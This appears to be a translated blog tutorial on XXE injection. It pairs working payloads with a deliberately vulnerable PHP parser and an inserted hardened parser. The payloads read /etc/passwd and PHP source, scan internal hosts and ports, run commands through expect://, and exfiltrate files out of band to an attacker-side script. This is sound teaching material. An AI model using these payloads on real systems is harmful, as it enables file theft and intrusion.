XML External Entity Injection Basics

XML External Entity Injection

What are XML and DTD?

XML + DTD

<?xml version = "1.0" encoding = "UTF-8" standalone = "yes" ?>
<!DOCTYPE address [ <!ELEMENT address (name,company,phone)>
        <!ELEMENT name (#PCDATA)>
        <!ELEMENT company (#PCDATA)>
        <!ELEMENT phone (#PCDATA)> ]>
<address><name>Tanmay Patik</name><company>TutorialsPoint</company> <phone>(011)123-4567</phone></address>

XML

<?xml version="1.0" encoding="utf-8" ?>
<!-- Import the DTD file that constrains this XML -->
<!DOCTYPE 班级 SYSTEM "xxe.dtd">
<班级>
    <学生>
        <名字>小宏</名字>
        <年龄>20</年龄>
        <介绍>ctf小白</介绍>
    </学生>
</班级>

Advantages of XML

XML is an important tool for data transmission on the Internet. It works across any platform and is not tied to a particular programming language or operating system, which makes it well suited to Web transmission; XML lets structured data travel between servers and makes it convenient for developers to control how data is stored and transmitted.
Moreover, many configuration files are written in XML, and data interchange is performed across platforms, operating systems and programming languages, so XML is clearly very convenient and very widely used. But precisely because it is everywhere, the harm caused when it has vulnerabilities is self-evident.

  Syntax
1. Every XML element must have a closing tag.
2. XML tags are case sensitive.
3. XML elements must be properly nested.
4. An XML document must have a root element.
5. XML attribute values must be quoted.
  Structure
1. The XML document declaration, on the first line of the document
2. The XML document type definition, i.e. the DTD, which is where the XXE vulnerability lives
3. The XML document elements

DTD

  • Document Type Definition
  • https://www.tutorialspoint.com/dtd/dtd_elements.htm
  • <!ELEMENT element-name content-model>
  • <!ELEMENT class (student+)>
<!ELEMENT 班级 (学生+)>
<!ELEMENT 学生 (名字,年龄,介绍)>
<!ELEMENT 名字 (#PCDATA)>
<!ELEMENT 年龄 (#PCDATA)>
<!ELEMENT 介绍 (#PCDATA)>

External entities (references to data in XML are called entities; external entities are used to pull in external resources)

There are two keywords, SYSTEM and PUBLIC, indicating whether the entity comes from the local machine or from a public source.
External entity references can use protocols such as the following:
file:///path/to/file.ext
http://url/file.ext
php://filter/read=convert.base64-encode/resource=conf.php


For example:
<!DOCTYPE foo [
	<!ELEMENT foo ANY >
	<!ENTITY  % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >
%xxe;
]>
<foo>&evil;</foo>

Contents of the external evil.dtd:
<!ENTITY evil SYSTEM "file:///d:/1.txt" >

XXE vulnerability

What is the XXE vulnerability?

  • XXE stands for XML External Entity Injection. The vulnerability occurs when an application parses XML input without prohibiting the loading of external entities, so that a malicious external file can be loaded; the consequences include file disclosure, command execution, intranet port scanning, attacks on intranet websites, DoS attacks and other harms.

Example

<?php
error_reporting(0);
echo LIBXML_DOTTED_VERSION;
libxml_disable_entity_loader(false);   // external entities can only be exploited when this is false
$xmlfile = file_get_contents('php://input');   // reads the raw request body, much like a file include reading a file
$dom = new DOMDocument();
// LIBXML_NOENT substitutes entity references and LIBXML_DTDLOAD fetches external DTDs: together they enable XXE
$dom->loadXML($xmlfile, LIBXML_BIGLINES | LIBXML_NOWARNING | LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
echo $creds;
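A hardened counterpart to the parser above, added here as an example rather than code from the original post. It assumes PHP 7.4 or later; the function name parseUntrustedXml and the log messages are the editor's choices.

```php
<?php
// Added example: hardened replacement for the vulnerable parser above.
// Three independent layers, so that one mistake does not reopen XXE:
//   1. Refuse any document carrying a DOCTYPE: entities (internal or
//      external) can only be declared there, and a data API never needs them.
//   2. Do not pass LIBXML_NOENT / LIBXML_DTDLOAD, so libxml neither substitutes
//      entities nor fetches external DTDs; pass LIBXML_NONET to forbid network
//      access during parsing.
//   3. Register an external entity loader that always fails, so that even a
//      misconfigured loadXML() call elsewhere in the process cannot fetch
//      file:// or http:// resources (libxml_disable_entity_loader() covers
//      PHP < 8.0, where the loader was still enabled by default).
function parseUntrustedXml(string $xml): ?DOMDocument
{
    // Layer 1: cheap pre-parse guard; XML requires the literal "<!DOCTYPE".
    if (strpos($xml, '<!DOCTYPE') !== false) {
        error_log('rejected XML carrying a DOCTYPE (possible XXE attempt)');
        return null;
    }

    // Layer 3: make every external entity load fail, whatever options are used.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    libxml_set_external_entity_loader(function ($publicId, $systemId) {
        error_log("blocked external entity load: system id {$systemId}");
        return null; // returning null makes libxml abort the load
    });

    // Collect libxml errors instead of emitting warnings into the response.
    $previous = libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    // Layer 2: no NOENT, no DTDLOAD; NONET blocks any network fetch.
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    return $ok ? $dom : null;
}

// The "unfiltered XXE" document from the page is rejected by layer 1 before
// libxml ever sees the SYSTEM entity; a plain document still parses.
$blocked = parseUntrustedXml('<?xml version="1.0"?><!DOCTYPE xxe [<!ENTITY xee SYSTEM "file:///flag">]><root><ctfshow>&xee;</ctfshow></root>');
var_dump($blocked === null);
$clean = parseUntrustedXml('<?xml version="1.0"?><root><ctfshow>hello</ctfshow></root>');
echo $clean->getElementsByTagName('ctfshow')->item(0)->textContent, PHP_EOL;
```

The DOCTYPE guard is the cheapest check and the one to log on: a legitimate client of a data API never sends a DTD, so any hit is worth an alert.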

Unfiltered XXE

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE  xxe [
<!ENTITY xee SYSTEM "file:///flag">
]>
<root>
<ctfshow>
&xee;
</ctfshow>
</root>

XXE in practice (specific application examples)

File read

Use pseudo-protocols such as file:// and php:// to obtain files (it is best to use the php://filter wrapper to base64-encode the content, so that markup inside the target file does not break the XML being parsed)

php://filter/convert.base64-encode/resource=1.php

<!DOCTYPE TEST [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=1.php">]>---- DTD part
<catalog>
	<core id ="test101">
		<author>John</author>
		<title>I love XML</title>
		<category>Computers</category>------ XML part
		<price>9.99</price>
		<date>2018-10-01</date>
		<description>&xxe;</description>--- the content is echoed where &xxe; appears
	</core>
</catalog>

System file read

<!DOCTYPE TEST [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>---- DTD part
<catalog>
	<core id ="test101">
		<author>John</author>
		<title>I love XML</title>
		<category>Computers</category>------ XML part
		<price>9.99</price>
		<date>2018-10-01</date>
		<description>&xxe;</description>
	</core>
</catalog>

Intranet host scan

Use the http:// protocol and iterate the last octet of the IP address through a dictionary, combined with Burp brute-forcing, and judge which hosts exist from the length of the returned response

<!DOCTYPE TEST [<!ENTITY xxe SYSTEM "http://192.168.1.1">]>---- DTD part
<catalog>
	<core id ="test101">
		<author>John</author>
		<title>I love XML</title>
		<category>Computers</category>------ XML part
		<price>9.99</price>
		<date>2018-10-01</date>
		<description>&xxe;</description>
	</core>
</catalog>

Port detection

The parser will try to connect to port 8080, and the attacker can judge whether the port is open from the response time and length

<!DOCTYPE TEST [<!ENTITY xxe SYSTEM "http://192.168.1.1:8080">]>---- DTD part
<catalog>
	<core id ="test101">
		<author>John</author>
		<title>I love XML</title>
		<category>Computers</category>------ XML part
		<price>9.99</price>
		<date>2018-10-01</date>
		<description>&xxe;</description>
	</core>
</catalog>

Remote code execution

This rarely happens, but there are cases where attackers are able to execute code via XXE, mainly because of misconfiguration or in-house development of internal applications. If PHP's expect module is loaded on the vulnerable system or in an internal application that processes XML, the following command can be executed:

<!DOCTYPE TEST [<!ENTITY xxe SYSTEM "expect://id">]>---- DTD part
<catalog>
	<core id ="test101">
		<author>John</author>
		<title>I love XML</title>
		<category>Computers</category>------ XML part
		<price>9.99</price>
		<date>2018-10-01</date>
		<description>&xxe;</description>
	</core>
</catalog>

XXE Advanced (Blind OOB XXE)

In many cases XXE will not return the content we want to read directly (no echo). Much like blind injection in SQL injection, the key data is never shown in the interface or in the response packets.

Write files using file_put_contents

Here, when the XXE has no echo, build an out-of-band (OOB) data channel to carry the data out, and have the receiving server write it straight to a file (with file_put_contents), which achieves the goal of reading the data.

Construct payload1

<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://192.168.1.1/xxe.dtd">
%remote;
%int;
%send;
]>---- DTD part; downloads payload2 from 192.168.1.1
<catalog>
	<core id ="test101">
		<author>John</author>
		<title>I love XML</title>
		<category>Computers</category>------ XML part
		<price>9.99</price>
		<date>2018-10-01</date>
		<description>&xxe;</description>
	</core>
</catalog>

Payload2 (the contents of the external xxe.dtd)

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=key.php">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://192.168.0.1/xxe.php?p=%file;'>">


Origin blog.csdn.net/qq_63928796/article/details/128199689